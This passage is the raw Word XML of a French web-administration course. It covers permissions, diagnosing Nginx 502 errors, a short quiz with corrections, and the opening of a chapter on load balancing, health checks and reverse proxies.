        <w:t>chmod 755 /var/www /var/www/exemple</w:t>
        <w:br/>
        <w:t>chmod 644 /var/www/exemple/index.html</w:t>
        <w:br/>
        <w:t>chown -R www-data:www-data /var/www/exemple</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un répertoire parent sans bit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche la traversée, même si le fichier est lisible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>chmod 755</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur les répertoires et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>644</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur les fichiers suffisent ; inutile d'ouvrir l'écriture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 60.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ss -ltnp | grep 3000</w:t>
        <w:br/>
        <w:t>curl -v http://127.0.0.1:3000/health</w:t>
        <w:br/>
        <w:t>journalctl -u mon-app -n 50 --no-pager</w:t>
        <w:br/>
        <w:t>tail -20 /var/log/nginx/error.log</w:t>
        <w:br/>
        <w:br/>
        <w:t># Causes typiques : application non démarrée, port différent,</w:t>
        <w:br/>
        <w:t># écoute sur 127.0.0.1 alors que Nginx cherche une autre adresse,</w:t>
        <w:br/>
        <w:t># démarrage plus long que le délai de reprise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un 502 signifie que le proxy n'a pas pu joindre l'amont : la cause est en aval de Nginx.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Après un déploiement, le démarrage peut dépasser le délai : une vérification de santé évite de router du trafic trop tôt.</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 contexte Nginx définit un site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http</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server</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location</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upstream</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 xml:space="preserve">Que change une barre finale dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>proxy_pass</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Rien</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 chemin transmis à l'amont</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 port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 protocole</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 signifie un 502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Le client a mal formulé la requête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 proxy n'a pas pu joindre l'amont</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 fichier est absent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Trop de requêtes</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Quel en-tête transmet l'adresse réelle du client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Host</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X-Forwarded-For</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User-Agent</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Referer</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Quelle commande valide une configuration Nginx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nginx -v</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nginx -t</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nginx -s stop</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nginx -T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> seulement</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Le bloc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> correspond à un hôte virtuel.</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Avec barre, le préfixe correspondant est remplacé ; sans, il est conservé.</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Bad Gateway indique un échec de communication avec le service en amont.</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Il est renseigné par le proxy qui reçoit la requête d'origine.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> teste la syntaxe avant tout rechargement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>61. Répartition de charge, proxy et CDN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Répartir le trafic, absorber les pannes et rapprocher les contenus des utilisateurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 60</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Choisir un algorithme de répartition adapté.</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Configurer une vérification de santé utile.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Distinguer proxy inverse, proxy direct et CDN.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Comprendre la terminaison TLS et le reroutage.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Éviter les pièges de session et de cache.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>61.1 Ce que répartit un équilibreur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un équilibreur de charge distribue les requêtes entre plusieurs instances. Il apporte aussi la détection de panne, la terminaison TLS et parfois la limitation de débit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="73" name="Picture 73"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f71.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId105"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.71 — Une architecture à trois niveaux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.216 — Cinq algorithmes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3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Algorithme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="327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Principe</w:t>
            </w:r>
          </w:p>
        </w:tc>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Adapté à</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2732"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Round-robin</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Chacun son tour</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Instances équivalentes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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Least connections</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La moins chargée</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Requêtes longues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2732"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>IP hash</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Même client, même instance</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Sessions en mémoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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Weighted</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Poids par capacité</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Machines hétérogènes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2732"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Random</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Au hasard</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Grandes flottes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un groupe avec secours · nginx</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Nginx : groupe d'amont</w:t>
        <w:br/>
        <w:t>upstream application {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    least_conn;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server 10.0.0.11:3000 max_fails=3 fail_timeout=30s;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server 10.0.0.12:3000 max_fails=3 fail_timeout=30s;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server 10.0.0.13:3000 backup;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    keepalive 32;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>server {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    listen 443 ssl;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server_name exemple.fr;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ...</w:t>
        <w:br/>
        <w:t xml:space="preserve">    location / {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        proxy_pass http://application;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        proxy_next_upstream error timeout http_502 http_503;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        proxy_connect_timeout 2s;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        proxy_read_timeout 30s;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</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`BACKUP`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Serveur qui ne reçoit de trafic que si tous les autres sont indisponibles. Utile pour une instance de secours ou une version de maintenance.</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LES SESSIONS EN MÉMOIRE CASSENT LA RÉPARTITION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Si chaque instance garde la session dans sa mémoire, un utilisateur connecté sur l'instance 1 est déconnecté quand il tombe sur l'instance 2. Deux solutions : sessions partagées (base, Redis) ou affinité de session.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>61.2 Vérifications de santé</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une vérification de santé qui ne teste que la connexion TCP est insuffisante : une application peut accepter des connexions et ne plus répondre. Un point d'entrée dédié doit vérifier les dépendances essentielles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux approches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Nginx open source : vérification passive</w:t>
        <w:br/>
        <w:t># (max_fails / fail_timeout observent les échecs réels)</w:t>
        <w:br/>
        <w:t># Nginx Plus ajoute la vérification active.</w:t>
        <w:br/>
        <w:br/>
        <w:t># Alternative : HAProxy</w:t>
        <w:br/>
        <w:t>backend application</w:t>
        <w:br/>
        <w:t xml:space="preserve">    option httpchk GET /health</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http-check expect status 200</w:t>
        <w:br/>
        <w:t xml:space="preserve">    default-server inter 3s fall 3 rise 2</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server app1 10.0.0.11:3000 check</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server app2 10.0.0.12:3000 check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un point de santé utile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Le point d'entrée doit rester simple et rapide</w:t>
        <w:br/>
        <w:t>app.get("/health", async (req, res) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    await db.query("SELECT 1");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    res.json({ statut: "ok", version: process.env.VERSION });</w:t>
        <w:br/>
        <w:t xml:space="preserve">  } catch (e) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    res.status(503).json({ statut: "degrade", erreur: e.message });</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.217 — Quatre niveaux de vérification</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25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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Teste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="352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Risque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le port écoute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3521"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Application bloquée acceptée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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HTTP 200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Le processus répond</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="352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Base inaccessible ignorée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dépendances</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Base, cache, files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3521"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Santé trop stricte : tout tombe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Synthétique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Parcours utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="352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Coût et complexité</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SANTÉ STRICTE OU TOLÉRANTE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Une vérification qui inclut toutes les dépendances peut retirer toutes les instances simultanément lors d'une panne de base. Distinguez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/health</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (vivacité) et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/ready</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (capacité à servir).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>61.3 Proxy inverse et proxy direct</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un proxy inverse représente les serveurs face aux clients ; un proxy direct représente les clients face aux serveurs. Les deux partagent la même technologie, mais pas le même rôle.</w:t>
      </w:r>
    </w:p>
    <w:p>
